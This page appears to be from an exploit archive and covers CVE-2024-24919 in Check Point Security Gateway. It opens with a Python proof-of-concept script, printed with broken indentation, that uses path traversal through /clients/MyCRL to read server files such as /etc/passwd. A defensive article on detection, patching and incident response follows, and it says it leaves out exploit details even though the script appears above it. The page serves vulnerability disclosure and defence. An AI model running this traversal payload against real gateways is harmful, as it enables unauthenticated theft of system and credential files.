Check Point Security Gateway - Information Disclosure (Unauthenticated)

Exploit Author: Yesith Alvarez Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-05-31 
# Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 
# CVE : CVE-2024-24919

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, |
 | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / / 
  \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/  
                                                                                 
                                                                          
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')   

def exploit(url, path):
url = url + '/clients/MyCRL'
data = "aCSHELL/../../../../../../../../../../.."+ path
headers = {
'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
}
s = Session()
req = Request('POST', url, data=data, headers=headers)
prepped = req.prepare()
#del prepped.headers['Content-Type']
resp = s.send(prepped,
    verify=False,
    timeout=15
)  
print(prepped.headers)
print(url)
print(resp.headers)
print(resp.status_code)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 3):
    print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))
    print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))    
    exit(0)
    else:
    exploit(sys.argv[1],sys.argv[2])


Check Point Security Gateway — CVE-2024-24919: Unauthenticated Information Disclosure

This article explains the Check Point Security Gateway information disclosure vulnerability tracked as CVE-2024-24919. It focuses on what the issue is, which products are affected, the potential impact and attack scenarios, forensic and detection guidance, and practical remediation and hardening steps security teams should follow. The content is defensive in nature and omits active exploit details.

Overview

CVE-2024-24919 is an information disclosure vulnerability in certain Check Point Security Gateway builds. It allows an unauthenticated remote actor to retrieve sensitive server-side information via a web-facing endpoint. Because the vulnerability can be triggered without valid credentials, exposed gateways that are reachable from untrusted networks are at elevated risk.

Affected Products and CVE Details

Vendor Product Affected Versions CVE
Check Point Security Gateway / Management components R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL and x/SP), R80.30 (EOL and SP), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 CVE-2024-24919

Always verify the latest affected lists and fixes on the vendor advisory page: https://support.checkpoint.com/results/sk/sk182336

Root Cause and Impact (High-Level)

  • The issue is an unauthenticated information disclosure through a web endpoint used by the product.
  • Root cause patterns typically include insufficient input validation or unsafe file/resource access handling in HTTP handlers, allowing remote retrieval of files or server responses not intended for unauthenticated clients.
  • Potential impact: exposure of system files, configuration material, cryptographic artifacts, or other sensitive data that could support further intrusion, privilege escalation, or targeted attacks.

Likely Attack Scenarios (Defensive Perspective)

  • Remote attacker scans Internet-exposed Check Point management/gateway endpoints for the vulnerable path and requests content, gaining sensitive configuration or secret material.
  • Exposed management planes reachable from untrusted networks are especially prone to reconnaissance and follow-on exploitation.
  • Leaked artifacts (certificates, keys, config files) can be used to impersonate devices or pivot into critical network segments.

Detection and Indicators of Compromise (IoCs)

Focus on identifying anomalous access to web endpoints and abnormal data exfiltration patterns. Examples of safe, defensive search queries and indicators you can use in logs or SIEM:


# Example (search-oriented) pseudo-query for web access logs:
index=web_logs source=apache_access OR nginx_access
| search uri="/clients/MyCRL" OR uri="/clients/MyCRL*"
| stats count by client_ip, status, uri, _time
| where count > 10

Explanation: This safe pseudo-query highlights repeated access to the MyCRL endpoint. It does not include exploit payloads; it helps spot reconnaissance or automated probing.

Other useful detection signals:

  • Unexpected 200 responses to previously unused administrative endpoints.
  • Unusual GET/POST body sizes or binary-like responses from management endpoints.
  • Access to /clients/MyCRL or equivalent endpoints from external/untrusted IPs.
  • Sudden download of large textual configuration data from management hosts.

Safe Testing and Verification (Non-Exploitative)

Do not perform unauthorised testing against production or third-party assets. For internal validation, create an isolated lab or test instance that mirrors your production configuration and apply the vendor-supplied patches there first.

Suggested verification approach (defensive):

  • Confirm software version and build numbers on your Check Point systems using vendor-approved management tools or the product UI/API.
  • Check whether the system is listed as patched in vendor advisories or via your update management workflow.
  • Where possible, validate that the management interface and web endpoints are not reachable from untrusted networks (use network scans from your own trusted lab).

Remediation & Mitigation

Immediate and planned steps for mitigating CVE-2024-24919:

  • Apply official patches: prioritize installing the vendor security updates referenced in the Check Point advisory. Patching is the primary remediation.
  • Restrict network exposure: ensure management and gateway web interfaces are not directly reachable from the Internet. Implement access-control lists and management-plane filtering to allow only trusted admin networks or IPs.
  • Harden administrative access: enable multi-factor authentication, strong role separation, and least-privilege administration.
  • Deploy IDS/IPS signatures: update intrusion prevention signatures from Check Point or your network security vendor to detect exploit attempts targeting known vulnerable endpoints.
  • Monitor logs and set alerts for anomalous access patterns to management-related URIs or unexpected downloads.

Network-Level and Configuration Recommendations

  • Segment management interfaces into a dedicated management VLAN/subnet that is not routable from untrusted networks.
  • Use firewall rules to limit web-management traffic (HTTPS) to a small set of administrative IPs and subnets.
  • Disable or limit legacy/unused services on gateways and management servers.
  • Audit TLS certificates and private key storage; rotate keys if compromise is suspected.

Incident Response and Forensics

If you detect evidence of this vulnerability being exploited in your environment, follow incident response best practices:

  • Isolate affected hosts from the network segments accessible to attackers, while preserving volatile evidence.
  • Collect relevant logs: web server access/err logs, Check Point audit logs, system authentication logs, and network IDS traffic around the time of suspicious activity.
  • Preserve disk images and memory snapshots for forensic analysis when appropriate.
  • Look for secondary indicators—unexpected accounts, new firewall rules, or lateral movement to management subnets.
  • Coordinate with Check Point support and, where required, with legal and regulatory teams for disclosure and reporting obligations.

Hardening Checklist (Actionable but Non-Exploitative)

  • Keep Check Point appliances and management servers up to date with vendor security releases.
  • Restrict administrative web/UI access to specific management networks and use VPNs or jump hosts for remote admin access.
  • Enable strong authentication and centralize logging to a hardened SIEM.
  • Regularly audit configuration files, certificate storage, and user accounts for signs of misconfiguration or compromise.
  • Implement monitoring rules to alert on unusual downloads from management endpoints or repeated access attempts from unfamiliar IPs.

References and Further Reading

  • Check Point advisory and support article: https://support.checkpoint.com/results/sk/sk182336
  • CVE entry: CVE-2024-24919 (for tracking metadata)
  • General secure operations guidance: network segmentation, patch management, and least privilege administration.

Maintaining visibility into management-plane activity and applying vendor patches promptly are the most effective controls against information disclosure flaws like CVE-2024-24919. If you suspect exposure, prioritize containment, evidence collection, and coordination with the vendor and incident response teams.